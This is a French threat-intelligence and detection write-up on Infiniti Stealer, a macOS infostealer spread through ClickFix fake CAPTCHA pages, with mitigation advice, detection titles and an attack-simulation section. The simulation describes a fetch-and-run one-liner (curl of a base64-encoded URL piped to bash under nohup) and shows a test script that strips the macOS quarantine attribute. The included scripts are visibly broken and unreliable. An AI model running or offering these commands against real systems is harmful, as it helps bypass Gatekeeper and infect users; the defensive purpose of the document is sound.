Infiniti Stealer : un nouvel infostealer macOS utilisant ClickFix et Python/Nuitka
Detection stack
- AIDR
- Alert
- ETL
- Query
Résumé
Un nouvel infostealer macOS nommé Infiniti Stealer a été repéré en utilisant un leurre d’ingénierie sociale ClickFix pour infecter les utilisateurs. Le malware est construit avec Nuitka, qui convertit le code Python en un binaire Mach-O natif, rendant l’inspection statique plus difficile. Une fois exécuté, il vole des identifiants, des données du trousseau d’accès, des fichiers de portefeuilles de cryptomonnaie et d’autres informations sensibles, puis exfiltre les données collectées via des requêtes HTTP POST. La campagne repose également sur une fausse page CAPTCHA hébergée sur un domaine malveillant pour inciter les victimes à exécuter une commande Bash nuisible.
Enquête
Les chercheurs ont découvert la charge utile lors d’une chasse aux menaces de routine et l’ont d’abord suivie sous le nom temporaire NukeChain avant que le panneau de l’acteur de la menace n’expose le marquage final en tant qu’Infiniti Stealer. L’analyse a révélé un flux en trois étapes : un dropper Bash livré via un faux CAPTCHA, un chargeur compilé par Nuitka, et un module voleur basé sur Python. Le dropper place le binaire dans /tmp, supprime l’attribut de quarantaine et le lance tout en passant les détails C2 via des variables d’environnement. La dernière étape collecte des données à partir des navigateurs, du trousseau, des portefeuilles et des fichiers liés au développeur avant de les envoyer au serveur contrôlé par l’attaquant.
Atténuation
Les utilisateurs ne devraient jamais copier et exécuter des commandes à partir de sites web inconnus, en particulier les pages prétendant vérifier des défis CAPTCHA. Les défenseurs devraient inspecter et supprimer les fichiers suspects dans /tmp or ~/Library/LaunchAgents, effectuer une analyse anti-malware de confiance, et changer les mots de passe de tous comptes potentiellement exposés depuis un système propre. Tout jeton d’API actif ou clé SSH qui pourrait avoir été collecté devrait également être révoqué.
Réponse
Les équipes de détection devraient surveiller le script dropper et le binaire compilé par Nuitka en surveillant la création de fichiers dans /tmp qui correspond au schéma de nommage décrit. Les alertes devraient se déclencher lors de l’exécution de la commande Bash malveillante et sur le trafic HTTP POST sortant vers le domaine C2 identifié. L’accès au réseau à update-check.com and infiniti-stealer.com devrait être bloqué. Un examen légal basé sur l’hôte devrait alors identifier les identifiants volés et soutenir les réinitialisations d’identifiants obligatoires.
Flux d’attaque
Détections
Évasion possible des défenses en contournant MacOS Gatekeeper (via la ligne de commande)
Voir
Manupulation possible de chaînes encodées en Base64 [MacOS] (via la ligne de commande)
Voir
Tentative d’exécution Curl suspecte [MacOS] (via la ligne de commande)
Voir
IOCs (HashMd5) pour détecter : Infiniti Stealer : un nouvel infostealer macOS utilisant ClickFix et Python/Nuitka
Voir
IOCs (HashSha256) pour détecter : Infiniti Stealer : un nouvel infostealer macOS utilisant ClickFix et Python/Nuitka
Voir
Détection d’infection par Infiniti Stealer via l’exécution de commande Terminal [Création de processus Linux]
Voir
Exécution de simulation
Prérequis : Le contrôle préalable de télémétrie et de base doit avoir réussi.
Narration et commandes d’attaque
Un attaquant livre un lien de phishing qui, une fois ouvert sur un poste de travail macOS, exécute la commande suivante en une seule ligne dans Terminal. La commande :
- Télécharge une URL encodée en base64 (l’hôte de la charge utile) via
curl -sSfL. - Décode la chaîne base64 pour révéler l’URL HTTPS réelle.
- Exécute le script téléchargé avec
bash. - Exécute sous
nohuppour le garder actif après la fermeture du terminal. - Supprime l’attribut de quarantaine (
xattr -dr com.apple.quarantine) pour contourner Gatekeeper.
Ces étapes produisent exactement les fragments de ligne de commande que la règle Sigma surveille, générant ainsi l’alerte attendue.
Script de test de régression
#!/usr/bin/env bash
# ------------------------------------------------------------
# Simulation d'infection par Infiniti Stealer (macOS)
# ------------------------------------------------------------
# 1. Construire la commande malveillante en une seule ligne (exactement comme la règle l'attend)
MALICIOUS_CMD="bash /dev/null 2>&1 &"
MALICIOUS_CMD+=" && xattr -dr com.apple.quarantine /Applications/Utilities/Terminal.app"
# 3. Exécuter la commande
eval "$MALICIOUS_CMD"
# 4. Attendre quelques secondes pour permettre l'ingestion par le SIEM
sleep 5
# 5. Afficher un marqueur pour la vérification manuelle
echo ">>> Simulation exécutée – surveillez le SIEM pour une alerte <<<"
Commandes de nettoyage
#!/usr/bin/env bash
# ------------------------------------------------------------
# Nettoyage après simulation d'Infiniti Stealer
# ------------------------------------------------------------
# Tuer tous les processus nohup en arrière-plan démarrés par la simulation
pkill -f "bash /dev/null || true
echo "Nettoyage terminé."
Fin du rapport